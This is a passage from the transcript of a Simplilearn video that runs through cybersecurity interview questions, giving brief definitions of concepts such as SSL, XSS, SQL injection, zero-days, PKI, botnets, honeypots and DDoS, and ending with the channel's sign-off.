question. What is SSL encryption? Secured sockets layer encrypted data between a web browser and a browser to prevent eavesdropping and tampering. Proceeding ahead, we have the 13th question. Explain a data security audit. So a security audit is an organization's security control, policies, and vulnerabilities to identify and mitigate risks. Now, the 14th question. Explain cross-site scripting and SQL injection. XSS injects malicious scripts into web pages to steal data. SQL injection manipulates database queries to gain unauthorized access. Now, the 15th question. What is a zero-day vulnerability? So, it refers to a security vulnerability present in software or hardware that is undisclosed to the vendor and lacks an existing solution. This loophole can be leveraged by malicious actors before a remedy is created. So, proceeding ahead, we have our 16th question. Discuss the ISO 27001 and 27002 standards. So, it is a framework for information security management systems, which is ISMS, while ISO 27002 provides guidelines for implementing security controls and practices within an organization. Now, proceeding ahead, we have the 17th question. Explain the principles of ethical hacking. Ethical hackers identify vulnerabilities legally, following rules and engagement, ensuring data integrity, and reporting findings responsibly. Now we have the 18th question. What are the different types of network security? So the 18th question. What are the different types of network security? So the different types of network security includes firewalls, IDS or IPS, encryption, VPNs, endpoint protection, network segmentation, and access controls. Proceeding ahead, we have the 19th question. So moving ahead, we have the 19th question. Discuss the concept of risk assessment in cybersecurity. Risk assessment evaluates threats, vulnerabilities, and potential impacts to prioritize security measures. Now, moving ahead, we have the next question, which is, what is the incident response and how is it managed? So the answer is, incident response is handling security breaches using a structured approach, which is detection, containment, eradication, recovery, and lessons learned. Now, moving ahead, we have the 21st question, which talks about what is the CIA triad in cybersecurity. So, CIA stands for C, confidentiality, which is data privacy, I for integrity, which is data accuracy, and A for availability, which is for data access when needed from the CIA triad. Proceeding ahead, we have the 22nd question. What is network sniffing? Capturing and analyzing network traffic using tools like Wireshark, which attackers exploit to intercept sensitive data, is called as network sniffing. Now, the 23rd question. How do you manage cryptographic keys? Using key management systems like KMS, rotate key regularly, use strong storage methods, and enforce least private access, you can manage the cryptographic keys. Now we have the 24th question. Define the terms virus, malware, and ransomware. So the answer for this question is, firstly, a virus. Virus replicates and spreads. Next is malware, includes all malicious software. And lastly, the ransomware, where data gets encrypted and the attacker demands payment for decrypting the data. Now, the 25th question. What is the difference between HIDS and NIDS? So HIDS is host-based IDS, which monitors systems activity on a device, while NIDS is network-based IDS, which analyzes network traffic for threats. Now proceeding ahead, we have the 26th question, which asks about explain data leakage. So unauthorized data exposure via breaches, insider threats, or misconfigurations prevented by DLP or data loss prevention tools is known as data leakage. Now proceeding ahead, we have the 27th question. What is port scanning? A technique used to identify open ports on a system, often used by attackers to find vulnerabilities, is called as port scanning. Proceeding ahead, we have the 28th question. How often should you perform patch management? So, standard-wise, the answer for this question is it should be done as soon as it is released. And in some cases, it should be done regularly based on risk-based approach, and typically for monthly standard patches and immediately for critical vulnerabilities. Proceeding ahead, we have the 29th question. How would you reset a password protected BIOS configuration? Now, the answer for this question is, since BIOS is a pre-boot system, it has its own storage mechanism for setting and preferences. A simple way to reset is by popping out the CMOS battery so that the memory storing the settings lose its power supply, and as a result, it will lose its setting. Now proceeding ahead, we have the 30th question. What is a botnet? So the answer for this question is a network of compromised devices controlled remotely to launch cyber attacks such as DDoS or spam campaigns is known as a botnet. Now the 31st question. What is the difference between a threat, a vulnerability, and a risk? So the answer is a threat is a potential danger. A vulnerability is a weakness. And lastly, a risk is a probability of exploitation. Now 32nd question. What is cognitive cybersecurity? AI-driven cybersecurity that uses machine learning and natural language processing to detect and respond to threats is known as cognitive cybersecurity. Now, the 33rd question. What is a block cipher? A block cipher is a symmetric encryption method that encrypts data in fixed-size blocks such as AES. Now, 34th question. What do you mean by shoulder surfing? So, it's a very simple answer. Basically, someone which is observing your screen or keypad to steal credentials or sensitive data is called as shoulder surfing. Now, 35th question. What do you mean by system hardening? So, the answer for this question is strengthening a system's security by removing vulnerabilities, disabling unused services, and enforcing strict policies is known as system hardening. Now, the 36th question for the day. How to prevent MITM? So the answer is, to prevent MITM, you have to use SSL or TLS VPNs, multi-factor authentication, and avoid untrusted networks to prevent man-in-the-middle attacks. Now, 37th question is, what is a ransomware? So the answer for this question, before we get started, we briefly had a discussion about ransomware in our previous questions. Now let's have a detailed explanation for this one. Ransomware is a type of malware that encrypts data to make it inaccessible to computer users. Cybercriminals use it to extort money from the individuals and organizations as well that hack the data and hold the data hostage until a certain amount of ransom is paid. Now, proceeding ahead, we have the 38th question. What is public key infrastructure? So, the PKI, or also known as the public key infrastructure, issues digital certificates to secure communication, protect data, and provide unique identities. It uses public-private key pairs, requiring a strong infrastructure to safeguard public keys from the attackers. Now, 39th question. What is a proxy firewall? A firewall that filters traffic at the application layer, acting as an intermediary between users and the internet, is called as the proxy firewall. Now we have the 40th question. What do you mean by penetration testing? So a penetration testing is a simulated attack on systems to identify vulnerabilities before real attackers exploit them. Now, the 41st question. Explain what a cybersecurity policy is. So basically, a cybersecurity policy is a set of rules and guidelines to protect an organization's information and systems. Now, 42nd question. How does a rootkit work and how would you detect it? So the answer is, rootkits hide malware and avoid detection. In order to find one or detect one, you need to use rootkit scanners, behavioral analysis, and integrity checks to detect them. Now, the 43rd question. Explain the principle of least privilege. So, the users and processes should have the minimum permissions needed to perform their tasks to reduce security risks. So, this particular principle is known as least privilege. Now, 44th question. What are the key elements of a strong security policy? So, the answer to this question is access control, encryption, incident response, audit logging, risk management, and compliance requirements. So these are the key elements for a strong security policy. 45th question. Explain the concept of a digital signature. A cryptographic method ensuring the authenticity and integrity of digital messages using public key encryption is known as a digital signature. Now, the 46th question. What is a honeypot in cybersecurity? So the term honeypot is self-explanatory. So in terms of cybersecurity, it is a decoy system designed to attract the monitor attackers, helping identify the attack methods and also sometimes observe their behavior in order to understand what are their intentions. Now, 47th question. What are the common cybersecurity threats today? So some of the common cyber threats today are ransomware, phishing, DDoS attacks, insider threats, zero-day exploits, and supply chain attacks. Now, 48th question. How can you prevent a man-in-the-middle attack or MITM attack? So for that, you need to use encrypted communications like TLS or SSL, use VPNs, strong authentication, and avoid unsecured networks. 49th question. What is a DDoS attack and how does it work? So the answer to this question, firstly, DDoS, it is called as distributed denial of service, and DDoS overloads a system with excess traffic using a botnet, causing service disruption. So basically, it's kind of blocking the service. And with this, we come to the final question of today's session, which is, what is the difference between black hat, white hat, and gray hat hackers? So the answer for this question is, let's begin with the black hats. Black hats are malicious hackers. They exploit vulnerabilities for illegal purposes. And then we come with white hat. So ethical hackers who help to identify and fix vulnerabilities who have positive ethics are called as the white hat hackers. And gray hat, a kind of a mix and match between the both black hat and the white hat. So these hackers help identify vulnerabilities without malicious intent, but may not always have authorization.
Now with that, we have come to the end of our full course. I hope you like this video. Do hit the notification bell and subscribe for more such content by Simplilearn. Thank you and keep learning.
Hi there, if you like this video, subscribe to the Simplilearn YouTube channel and click here to watch similar videos. To nerd up and get certified, click here.